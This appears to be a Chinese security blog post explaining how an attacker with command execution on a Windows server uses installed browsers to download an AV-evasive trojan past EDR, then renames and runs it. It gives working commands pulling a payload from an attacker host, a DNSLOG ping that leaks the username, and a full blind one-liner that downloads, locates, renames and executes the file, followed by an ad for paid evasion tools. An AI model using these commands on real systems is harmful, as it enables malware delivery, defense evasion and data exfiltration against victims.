对于很多攻击测试人员来说,只要让我把程序上传到服务器,让我执行,我就能给你一切
我们希望把这个事情再向前推进一步,只要能执行命令,就能给你一切
对于 Linux 来说,这几乎没有难度,对于 Windows 来说,挺难受的,因为这些 EDR 软件会不竭余力地对我们远程下载进行阻拦,今天我再介绍一种简单的方法
向服务器上传木马这种事从本质上来说就是向服务器提交一些数据,之后服务器按照我们想要的方式进行存储。
我不知道为啥大家做这种事情最先用的是 certutil
、powershell
、vbs
、Bitsadmin
等,不应该是浏览器吗?
带着这个疑问,有了这篇文章
0x01 前提条件
前提条件
-
服务器出网
-
服务器安装了其他浏览器
-
firefox
-
chrome
-
edge
-
0x02 利用方法
首先,将我们的免杀木马后缀改为 rar ,当然,还有大量的后缀可以使用,需要注意的是,这种后缀的文件必须是直接下载,而不是在浏览器中打开,所以 .jpg
这种就别用了
firefox
start firefox http://192.168.1.1:19900/demo.rar
chrome
start chrome http://192.168.1.1:19900/demo.rar
edge
start msedge http://192.168.1.1:19900/demo.rar
0x03 实验测试
EDR: 360 安全卫士 + 360 杀毒
系统:Windows Server 2012
控制端:metasploit
为了更加真实地模拟远程命令执行环境,这里用 msf 的 shell 来模拟,使用 360 作为 EDR
模拟控制环境
配置木马下载服务器
我们使用 everything.exe 来模拟免杀木马
命令行中执行下载指令
以 firefox 为例
重命名我们远程下载的文件,重命名为 .exe
文件并执行
成功执行我们的“免杀木马”
chrome
edge
0x04 无回显如何执行
从上面实验环境来看没啥困难,但是在实际工作工程中,很多时候我们无法获取到回显,也就是说我们需要把整套命令建立在完全没有任何回显的条件下进行
一般来说,浏览器会自动下载到
C:\Users\username\Downloads
这个目录下, username 是当前用户名称
但是,如果没有回显,我们无法直接执行 whoami
获取用户名,所以要找到我们下载的文件,主要有两种方案
通过 DNSLOG 获取用户名,拼接得到路径
ping %USERNAME%.flag.9e56ka.dnslog.cn
这样,我们获取到当前用户名为 helper
,之后我们拼接处路径为 C:\Users\helper\Downloads
但是这种方法有盲点对吧,因为可能目标把下载默认位置给改了,这样我们就扑了个空
通过文件遍历找到文件位置
既然我们能控制文件的名字,那我们可以使用一个比较有代表性的名字,这里以 NNNNnop.rar
为例
远程下载;确定文件路径;重命名;执行
start msedge http://192.168.1.1:19900/NNNNnop.rar && ping -n 10 127.0.0.1 >NUL && for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""') do set kk=%k && (set dd=%kk:NNNNnop.rar=123456.exe%) && rename %k 123456.exe && ping -n 10 127.0.0.1 >NUL && cmd /c %dd%
这个命令挺复杂的,我按照步骤来简单说一下
-
使用 edge 浏览器远程下载
start msedge http://192.168.1.1:19900/NNNNnop.rar
-
延时 10 s
ping -n 10 127.0.0.1 >NUL
-
遍历所有盘符,寻找
NNNNnop.rar
这个文件cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""
NNNNnop.rar
是我们远程下载的文件名,这个文件名一定要唯一,不然后续的命令会把系统同名文件给重命名并且执行了,会影响系统 -
重命名
NNNNnop.rar
为123456.exe
,路径还是在下载路径for /f %k in ('cmd /v:off /Q /c "for /f %i in (^'wmic logicaldisk get caption ^| findstr ":"^') do dir %i\ /b /s 2>nul | findstr "NNNNnop.rar""') do set kk=%k && (set dd=%kk:NNNNnop.rar=123456.exe%) && rename %k 123456.exe
-
延时 10 s
ping -n 10 127.0.0.1 >NUL
-
执行我们的木马
cmd /c %dd%
成功执行了我们的“免杀木马
圈子的最近主题和圈子内部工具一些展示
poc漏洞库 8000+src陆续更新中 -紧跟时代发展争做先进网安人
一起愉快刷分-榜上有名
免杀-护网必备
新手学习、老手巩固-温故而知新
学习报告-三人行必有我师
各类会员-尊贵的SVIP
「你即将失去如下所有学习变强机会」
学习效率低,学不到实战内容,几千上万深造没有性价比
一顿自助钱,我承诺一定让用户满意,也希望用户能给予我一份信任
【详情下方图片了解】,【扫下方二维码加入】:只做高质量优质精品内容」
圈子目前价格为¥99元(交个朋友啦!),现在星球有近150+位师傅相信并选择加入我们,圈子每天都会更新内容,老用户可永久享受初始加入价格,圈子内容持续更新中
一张图总结
免责声明
由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。